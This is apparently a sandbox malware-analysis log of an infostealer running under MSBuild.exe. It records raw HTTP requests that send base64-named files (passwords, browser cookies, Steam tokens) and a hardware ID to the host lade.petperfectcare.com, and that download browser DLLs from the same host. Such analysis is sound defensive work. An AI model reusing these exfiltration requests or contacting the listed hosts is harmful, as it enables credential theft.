Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJKFHJJJKJJJJKEHCHost: lade.petperfectcare.comContent-Length: 829Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 62 63 34 62 37 63 31 31 63 66 39 36 37 38 36 65 62 31 39 66 61 35 37 35 65 34 64 38 30 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 2d 2d 0d 0a Data Ascii: ------JEGHJKFHJJJKJJJJKEHCContent-Disposition: form-data; name="token"d6bc4b7c11cf96786eb19fa575e4d80d------JEGHJKFHJJJKJJJJKEHCContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------JEGHJKFHJJJKJJJJKEHCContent-Disposition: form-data; name="file_name"
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKFHost: lade.petperfectcare.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 62 63 34 62 37 63 31 31 63 66 39 36 37 38 36 65 62 31 39 66 61 35 37 35 65 34 64 38 30 64 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 2d 2d 0d 0a Data Ascii: ------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="token"d6bc4b7c11cf96786eb19fa575e4d80d------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="file_data"------FIEHDBGDHDAECBGDHJKF--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHJJEHIEBKKFIDHDGHJHost: lade.petperfectcare.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 62 63 34 62 37 63 31 31 63 66 39 36 37 38 36 65 62 31 39 66 61 35 37 35 65 34 64 38 30 64 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 2d 2d 0d 0a Data Ascii: ------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="token"d6bc4b7c11cf96786eb19fa575e4d80d------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="file_data"------AFHJJEHIEBKKFIDHDGHJ--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST %s HTTP/1.0Host: %s%sContent-Type: application/ocsp-requestContent-Length: %uData Raw: 00 47 45 54 20 25 73 20 48 54 54 50 Data Ascii: GET %s HTTP
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJDHDGDAAKECAKJDAEHost: lade.petperfectcare.comContent-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEGHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 62 63 34 62 37 63 31 31 63 66 39 36 37 38 36 65 62 31 39 66 61 35 37 35 65 34 64 38 30 64 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 2d 2d 0d 0a Data Ascii: ------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="token"d6bc4b7c11cf96786eb19fa575e4d80d------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="mode"3------HJJJDAEGIDHCBFHJJJEG--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIDHIEGIIIECAKEBFBAHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 62 63 34 62 37 63 31 31 63 66 39 36 37 38 36 65 62 31 39 66 61 35 37 35 65 34 64 38 30 64 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 2d 2d 0d 0a Data Ascii: ------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="token"d6bc4b7c11cf96786eb19fa575e4d80d------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="mode"4------DHIDHIEGIIIECAKEBFBA--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFIHost: lade.petperfectcare.comContent-Length: 461Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 62 63 34 62 37 63 31 31 63 66 39 36 37 38 36 65 62 31 39 66 61 35 37 35 65 34 64 38 30 64 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 45 4e 54 39 51 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 2d 2d 0d 0a Data Ascii: ------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="token"d6bc4b7c11cf96786eb19fa575e4d80d------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="file_data"ENT9QA==------AAKKFHCFIECAAAKEGCFI--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKFHost: lade.petperfectcare.comContent-Length: 97829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJKKJJDAAAAAKFHJJDGHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 62 63 34 62 37 63 31 31 63 66 39 36 37 38 36 65 62 31 39 66 61 35 37 35 65 34 64 38 30 64 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 2d 2d 0d 0a Data Ascii: ------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="token"d6bc4b7c11cf96786eb19fa575e4d80d------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="mode"5------IJJKKJJDAAAAAKFHJJDG--

Source: Joe Sandbox View

ASN Name: VAKPoltavaUkraineUA VAKPoltavaUkraineUA

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49728 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

1_2_00406963

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: lade.petperfectcare.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJECGHJDBFIJJJKEHCBHost: lade.petperfectcare.comContent-Length: 255Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 46 46 38 41 33 35 46 30 43 43 34 32 35 33 38 31 37 36 37 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 2d 2d 0d 0a Data Ascii: ------KJJECGHJDBFIJJJKEHCBContent-Disposition: form-data; name="hwid"1FF8A35F0CC4253817676-a33c7340-61ca------KJJECGHJDBFIJJJKEHCBContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------KJJECGHJDBFIJJJKEHCB--

Source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
